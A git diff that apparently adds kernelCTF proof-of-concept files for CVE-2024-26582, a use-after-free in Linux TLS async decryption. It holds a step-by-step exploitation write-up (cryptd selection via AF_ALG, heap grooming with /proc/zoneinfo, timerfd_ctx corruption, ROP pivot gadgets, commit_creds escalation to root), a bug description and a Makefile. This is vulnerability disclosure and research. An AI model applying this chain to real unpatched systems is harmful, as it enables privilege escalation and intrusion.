google · lambdasprocket · Dec 10, 2025
diff --git a/pocs/linux/kernelctf/CVE-2024-26582_lts/docs/exploit.md b/pocs/linux/kernelctf/CVE-2024-26582_lts/docs/exploit.md
@@ -0,0 +1,210 @@
+## Setup
+
+To trigger the TLS encryption we must first configure the socket.
+This is done using the setsockopt() with SOL_TLS option:
+
+```
+        static struct tls12_crypto_info_aes_ccm_128 crypto_info;
+        crypto_info.info.version = TLS_1_2_VERSION;
+        crypto_info.info.cipher_type = TLS_CIPHER_AES_CCM_128;
+
+        if (setsockopt(sock, SOL_TLS, TLS_TX, &crypto_info, sizeof(crypto_info)) < 0)
+                err(1, "TLS_TX");
+
+```
+
+This syscall triggers allocation of TLS context objects which will be important later on during the exploitation phase.
+
+In KernelCTF config PCRYPT (parallel crypto engine) is disabled, so our only option to trigger async crypto is CRYPTD (software async crypto daemon).
+
+Each crypto operation needed for TLS is usually implemented by multiple drivers.
+For example, AES encryption in CBC mode is available through aesni_intel, aes_generic or cryptd (which is a daemon that runs these basic synchronous crypto operations in parallel using an internal queue).
+
+Available drivers can be examined by looking at /proc/crypto, however those are only the drivers of the currently loaded modules. Crypto API supports loading additional modules on demand.
+
+As seen in the code snippet above we don't have direct control over which crypto drivers are going to be used in our TLS encryption.
+Drivers are selected automatically by Crypto API based on the priority field which is calculated internally to try to choose the "best" driver.
+
+By default, cryptd is not selected and is not even loaded, which gives us no chance to exploit vulnerabilities in async operations.
+
+However, we can cause cryptd to be loaded and influence the selection of drivers for TLS operations by using the Crypto User API. This API is used to perform low-level cryptographic operations and allows the user to select an arbitrary driver.
+
+The interesting thing is that requesting a given driver permanently changes the system-wide list of available drivers and their priorities, affecting future TLS operations.
+
+Following code causes AES CCM encryption selected for TLS to be handled by cryptd:
+
+```
+        struct sockaddr_alg sa = {
+                .salg_family = AF_ALG,
+                .salg_type = "skcipher",
+                .salg_name = "cryptd(ctr(aes-generic))"
+        };
+        int c1 = socket(AF_ALG, SOCK_SEQPACKET, 0);
+
+        if (bind(c1, (struct sockaddr *)&sa, sizeof(sa)) < 0)
+                err(1, "af_alg bind");
+
+        struct sockaddr_alg sa2 = {
+                .salg_family = AF_ALG,
+                .salg_type = "aead",
+                .salg_name = "ccm_base(cryptd(ctr(aes-generic)),cbcmac(aes-aesni))"
+        };
+
+        if (bind(c1, (struct sockaddr *)&sa2, sizeof(sa)) < 0)
+                err(1, "af_alg bind");
+```
+
+## Triggering the first free of the physical page
+
+To free physical pages backing the skb we only have to perform a partial read on a socket that has some TLS data available.
+An order-0 page will be released to the PCP.
+
+## Reallocating released pages
+
+Any object that allocates from a cache using a single page slab can be used here.
+
+We decided to use user_key_payload object:
+
+```
+struct user_key_payload {
+        struct callback_head       rcu __attribute__((__aligned__(8))); /*     0  0x10 */
+        short unsigned int         datalen;              /*  0x10   0x2 */
+        char                       data[] __attribute__((__aligned__(8))); /*  0x18     0 */
+};
+```
+
+Before we trigger the partial read, we allocate a fresh slab of kmalloc-256 using the [zoneinfo parsing technique](novel-techniques.md#predicting-when-a-new-heap-slab-is-going-to-be-allocated).
+Then we allocate 15 more xattrs (whole slab fits 16), making sure that the next kmalloc-256 allocation will use our skb page from the PCP.
+
+Finally, we allocate the key.
+
+## Triggering the double free
+
+Reading the remaining data from the socket will release the physical page that is now used by user_key_payload objects.
+
+## Overwriting user_key_payload objects and leaking data
+
+Next step is to overwrite user_key_payload with simple_xattr:
+```
+struct simple_xattr {
+        struct list_head           list;                 /*     0  0x10 */
+        char *                     name;                 /*  0x10   0x8 */
+        size_t                     size;                 /*  0x18   0x8 */
+        char                       value[];              /*  0x20     0 */
+};
+```
+
+This has an effect of changing the datalen field of the key to a large value, giving us a leak.
+
+We use this to identify a target xattr located below the key we used for leaks. 
+We also look through other xattrs' next/prev pointers to determine target xattr's location in the kernel memory - we'll need it later to be able to set pointers to our payload.
+
+### Freeing xattr and allocating timerfd_ctx
+
+Our chosen xattr is then replaced with timerfd_ctx which also belongs to the kmalloc-256:
+
+```
+struct timerfd_ctx {
+        union {
+                struct hrtimer     tmr __attribute__((__aligned__(8))); /*     0  0x40 */
+                struct alarm       alarm __attribute__((__aligned__(8))); /*     0  0x78 */
+        } t __attribute__((__aligned__(8)));             /*     0  0x78 */
+        ktime_t                    tintv;                /*  0x78   0x8 */
+        ktime_t                    moffs;                /*  0x80   0x8 */
+        wait_queue_head_t          wqh;                  /*  0x88  0x18 */
+        u64                        ticks;                /*  0xa0   0x8 */
+        int                        clockid;              /*  0xa8   0x4 */
+        short unsigned int         expired;              /*  0xac   0x2 */
+        short unsigned int         settime_flags;        /*  0xae   0x2 */
+        struct callback_head       rcu __attribute__((__aligned__(8))); /*  0xb0  0x10 */
+        /* --- cacheline 3 boundary (192 bytes) --- */
+        struct list_head           clist;                /*  0xc0  0x10 */
+        spinlock_t                 cancel_lock;          /*  0xd0   0x4 */
+        bool                       might_cancel;         /*  0xd4   0x1 */
+
+        /* size: 216, cachelines: 4, members: 12 */
+};
+
+struct hrtimer {
+        struct timerqueue_node     node __attribute__((__aligned__(8))); /*     0  0x20 */
+        ktime_t                    _softexpires;         /*  0x20   0x8 */
+        enum hrtimer_restart       (*function)(struct hrtimer *); /*  0x28   0x8 */
+        struct hrtimer_clock_base * base;                /*  0x30   0x8 */
+        u8                         state;                /*  0x38   0x1 */
+        u8                         is_rel;               /*  0x39   0x1 */
+        u8                         is_soft;              /*  0x3a   0x1 */
+        u8                         is_hard;              /*  0x3b   0x1 */
+
+        /* size: 64, cachelines: 1, members: 8 */
+} __attribute__((__aligned__(8)));
+
+struct hrtimer_clock_base {
+        struct hrtimer_cpu_base *  cpu_base;             /*     0   0x8 */
+        unsigned int               index;                /*   0x8   0x4 */
+        clockid_t                  clockid;              /*   0xc   0x4 */
+        seqcount_raw_spinlock_t    seq;                  /*  0x10   0x4 */
+        struct hrtimer *           running;              /*  0x18   0x8 */
+        struct timerqueue_head     active;               /*  0x20  0x10 */
+        ktime_t                    (*get_time)(void);    /*  0x30   0x8 */
+        ktime_t                    offset;               /*  0x38   0x8 */
+
+        /* size: 64, cachelines: 1, members: 8 */
+} __attribute__((__aligned__(64)));
+
+```
+
+### Leaking kernel base and getting RIP control
+
+Next step is to leak the timerfd_ctx.t.tmr.function pointer to get the kernel text base.
+For this pointer to be set, the timer must be first activated with timerfd_setime().
+
+Next step is to trigger removal of key objects and replacing them with xattrs to overwrite timerfd_ctx objects with our fake timers.
+
+Fake timerfd_ctx is prepared in prepare_fake_timer().
+
+Instead of using the obvious t.tmr.function for RIP control, we used base.get_time() as it gives us code execution in the syscall context instead of an interrupt context.
+
+This means we have to find a place with a known location for our hrtimer_clock_base object, but fortunately we know the address of the timerfd_ctx because it's the same address we leaked from the xattr before.
+We only need one pointer from the hrtimer_clock_base so we use an unused offset of our fake timer for this purpose.
+
+Finally, we call timerfd_gettime() on our corrupted timerfd objects to get RIP control.
+
+### Pivot to ROP
+
+When get_time() is called, R12 contains a pointer to our timerfd_ctx.
+
+Following gadgets are used to pivot to ROP:
+
+```
+mov rsi, qword ptr [r12 + 0x48]
+mov rdi, qword ptr [r12 + 0x50]
+mov rdx, r15
+mov rax, qword ptr [r12 + 0x58]
+call    __x86_indirect_thunk_rax
+
+```
+
+then 
+
+```
+push rdi
+jmp qword ptr [rsi + 0xf]
+```
+
+and
+
+```
+pop rsp
+ret
+```
+
+which means our ROP chain at location pointed to by timerfd_ctx + 0x50. We also set this pointer to a part of the fake timerfd_ctx.
+
+## Second pivot
+
+At this point we have full ROP, but not much space left, so we choose an unused read/write area in the kernel and use copy_user_generic_string() to copy the second stage ROP from userspace to that area.
+Then we use a `pop rsp ; ret` gadget to pivot there.
+
+## Privilege escalation
+
+The execution is happening in the context of a syscall this time, so it's easy to escalate privileges with standard commit_creds(init_cred); switch_task_namespaces(pid, init_nsproxy); sequence and return to the root shell.
diff --git a/pocs/linux/kernelctf/CVE-2024-26582_lts/docs/novel-techniques.md b/pocs/linux/kernelctf/CVE-2024-26582_lts/docs/novel-techniques.md
@@ -0,0 +1,50 @@
+## Determining heap and page allocator state by parsing /proc/zoneinfo
+
+Linux kernel exposes a lot of information in a world-readable /proc/zoneinfo including:
+
+- per-node free/low/high page counters for the buddy allocator
+- per-cpu cache count/high/batch counters
+
+This can be useful in multiple ways during exploitation.
+
+### Predicting when a new heap slab is going to be allocated
+
+When performing a cross-cache attack or any other technique involving reuse of physical pages by SLUB allocator we would like to be able to allocate our victim object from a newly allocated slab.
+
+This is not trivial because we don't know the existing state of a given kmalloc cache - it probably already has some partial slabs and a new kmalloc will use them before allocating a new slab page.
+
+The usual solution to this problem is to just allocate a lot of objects and hope some will eventually be allocated from the new page.
+The downside is that we won't know which allocated object is the one we are interested in (the one from a new page).
+
+There are also often limits on the number of the victim object we can create.
+In an extreme case, the victim object can be a single-instance item and we only have one chance to get it allocated from the page we want.
+
+Lastly, when exploiting a use-after-free caused by a race condition we need to perform the reallocation in the shortest time possible and performing hundred allocation syscalls in the tight race condition window just won't work.
+
+Even when there are no such limitations, using this technique tends to increase exploit reliability.
+
+Parsing /proc/zoneinfo solves these problems by giving us a count of the currently available pages on our CPU, for example:
+```
+    cpu: 0
+              count: 293
+              high:  378
+              batch: 63
+```
+
+Before performing our attack we need to prepare by allocating objects from the chosen cache (e.g. kmalloc-256) and reading /proc/zoneinfo after each allocation.
+When count is decreased by the number of pages per slab (e.g. kmalloc-256 uses 1 page per slab and kmalloc-512 2 pages, but this is version and config dependent).
+
+When we notice the decrease in page it means our last allocation triggered a new slab.
+
+Now we have to allocate (objects_per_slab-1) objects and we can be sure that the current slab is full and next allocation (the important one) will use a newly allocated physical page.
+
+
+### Predicting how much we have to allocate free to trigger PCP flush
+
+Sometimes we want to reuse a physical page for allocation that needs a page of a different order (e.g. we have a use-after-free object from kmalloc-512 that uses order 1 page and we want to reallocate it from kmalloc-256 cache that uses order 0 pages).
+
+To be able to do this we have to flush our page from the PCP to return it to the buddy allocation. To do this we need to free enough physical pages to exceed the 'high' mark of the PCP. 
+Parsing /proc/zoneinfo allows us to know exactly how many pages have to be freed instead of doing it blindly.
+
+
+
diff --git a/pocs/linux/kernelctf/CVE-2024-26582_lts/docs/vulnerability.md b/pocs/linux/kernelctf/CVE-2024-26582_lts/docs/vulnerability.md
@@ -0,0 +1,33 @@
+## Requirements to trigger the vulnerability
+
+- Kernel configuration: CONFIG_TLS and one of [CONFIG_CRYPTO_PCRYPT, CONFIG_CRYPTO_CRYPTD]
+- User namespaces required: no
+
+## Commit which introduced the vulnerability
+
+https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=fd31f3996af2627106e22a9f8072764fede51161
+
+## Commit which fixed the vulnerability
+
+https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=32b55c5ff9103b8508c1e04bfa5a08c64e7a925f
+
+## Affected kernel versions
+
+Introduced in 6.0. Fixed in 6.1.78 and other stable trees.
+
+## Affected component, subsystem
+
+net/tls
+
+## Description
+
+When TLS decryption is used in async mode tls_sw_recvmsg() tries to use a zero-copy mode if possible, but this only works if the caller has enough space to receive the entire cleartext message.
+For partial reads a clear text skb is allocated in tls_decrypt_sg() instead.
+
+Pointers to physical pages backing this skb are then copied into the sgvec passed to tls_do_decryption(), but reference count is not increased on these pages.
+
+The skb is then added to the rx_list queue.
+
+After decryption is finished, tls_decrypt_done() calls put_page() on these pages, triggering their release, but they are still referenced in the skb in the rx_list queue.
+
+When another tls_sw_recvmsg() call is made on the same socket use-after-free happens, with data being read from the released physical pages backing the skb and when all data has been read, double-free happens, as consume_skb() tries to release the already released physical pages.
diff --git a/pocs/linux/kernelctf/CVE-2024-26582_lts/exploit/lts-6.1.77/Makefile b/pocs/linux/kernelctf/CVE-2024-26582_lts/exploit/lts-6.1.77/Makefile
@@ -0,0 +1,9 @@
+INCLUDES =
+LIBS = -pthread -ldl -lkeyutils
+CFLAGS = -fomit-frame-pointer -static -fcf-protection=none
+
+exploit: exploit.c kernelver_6.1.77.h
+	gcc -o $@ exploit.c $(INCLUDES) $(CFLAGS) $(LIBS)
+
+prerequisites:
+	sudo apt-get install libkeyutils-dev
diff --git a/pocs/linux/kernelctf/CVE-2024-26582_lts/exploit/lts-6.1.77/exploit b/pocs/linux/kernelctf/CVE-2024-26582_lts/exploit/lts-6.1.77/exploit